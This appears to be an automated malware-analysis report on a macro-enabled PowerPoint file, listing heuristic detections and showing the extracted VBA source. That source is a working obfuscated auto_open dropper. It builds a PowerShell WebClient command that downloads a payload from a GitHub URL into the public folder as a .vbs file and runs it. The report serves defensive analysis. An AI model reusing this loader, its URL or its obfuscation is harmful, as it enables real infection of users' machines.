MALICIOUS
230
Risk Score
Heuristics 7
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPERThe macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.Matched line in script
Sub auto_open() -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set pMxjFuP = GetObject(baFhJMAOy()) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set pMxjFuP = GetObject(baFhJMAOy()) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub auto_open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://raw.githubusercontent.com/farao151e/s/main/fevereiro.jpg��� In document text (OOXML body / shared strings)
- https://raw.githubusercontent.com/farao151e/s/main/fevereiro.jpg�In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3019 bytes |
SHA-256: f8304c1e9a5e4a5614271a01446ce29cd146320197c958629af9be89be34a58f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"
Sub auto_open()
On Error Resume Next
boloteia = gbyDNiUmZV()
End Sub
Function DBKuOoh()
DBKuOoh = "hs" + "re"
End Function
Function gbyDNiUmZV()
'VBvPcFXclnCC = Array(kgUHXlR(QgjxziNx()), kgUHXlR(rnsQt()))
fd780 = Array("l", "le", DBKuOoh(), "wo", "P")
hgf8 = Join(fd780, "")
Dim lll As String
lll = "c"
unbmyajjzms = "(NEw-objE" & lll & "t " & "system.net.wEBclIenT).DownLoAdfIlE" & "( ”https://raw.githubusercontent.com/farao151e/s/main/fevereiro.jpg” , ”$ENv:public\pandorinha.vbs” ) ; stARt-PRoCESs ”$ENv:public\pandorinha.vbs”"
'geTpUk (unbmyajjzms)
'qcydwyqnozj (kgUHXlR(hgf8) & Space(1) & a)
geTpUk (kgUHXlR(hgf8) & Space(1) & unbmyajjzms)
End Function
'=====================================================================
'Begin Code
Function kgUHXlR(w7df0sd)
Dim p
For p = Len(w7df0sd) To 1 Step -1
kgUHXlR = kgUHXlR & Mid(w7df0sd, p, 1)
Next
End Function
Sub geTpUk(twe70)
If 473708283 = 473708283 + 1 Then End
Dim bARdSPJbYuep As String
Set pMxjFuP = GetObject(baFhJMAOy())
pMxjFuP.Run twe70, 0
End Sub
Function AttzfJHm()
If 510001701 = 510001701 + 1 Then End
Dim XvZFokZtj As Double
AttzfJHm = GNufAJd(decrypt(Hex2Str("4533443B"), Hex2Str("33")) + decrypt(Hex2Str("3D4C4E3C384B383835414A4C4935"), Hex2Str("38")) + decrypt(Hex2Str("3347343430334946"), Hex2Str("33")) + decrypt(Hex2Str("38343D394A4B3C"), Hex2Str("37")) + decrypt(Hex2Str("393F4C407D6B74"), Hex2Str("36")))
End Function
Function baFhJMAOy()
If 118835736 = 118835736 + 1 Then End
Dim iDWQGl As String
baFhJMAOy = GNufAJd(decrypt(Hex2Str("4B394A413E4D4F3D39"), Hex2Str("39")) + decrypt(Hex2Str("4532322F3B4446432F32"), Hex2Str("32")) + decrypt(Hex2Str("4A373733364C493733"), Hex2Str("36")) + decrypt(Hex2Str("3333444536343A473B78666F"), Hex2Str("31")))
End Function
Function GNufAJd(w7df0sd)
Dim p
For p = Len(w7df0sd) To 1 Step -1
If 172023426 = 172023426 + 1 Then End
Dim QSTYgWCLLK As Currency
GNufAJd = GNufAJd & Mid(w7df0sd, p, 1)
Next
End Function
Public Function decrypt(strInput As String, second As Integer)
Dim first As Integer
For first = 1 To Len(strInput)
If 218466674 = 218466674 + 1 Then End
Dim QgIHX As Currency
Mid(strInput, first, 1) = Chr(Asc(Mid(strInput, first, 1)) - second)
Next first
If 340325665 = 340325665 + 1 Then End
Dim TKYiRREE As Integer
decrypt = strInput
End Function
Public Function Hex2Str(ByVal strData As String)
Dim second As Long, CryptString As String, tmpChar As String
On Local Error Resume Next
For second = 1 To Len(strData) Step 2
If 124270001 = 124270001 + 1 Then End
Dim XlHJScWA As Date
CryptString = CryptString & Chr$(Val("&H" & Mid$(strData, second, 2)))
Next second
If 567355800 = 567355800 + 1 Then End
Dim vbonEIKCbqi As Date
Hex2Str = CryptString
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 32768 bytes |
SHA-256: 26306d7544a1f7d12e98bdbdd99c1c17a9e373081f0f27ca15c2aded6a73814c |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.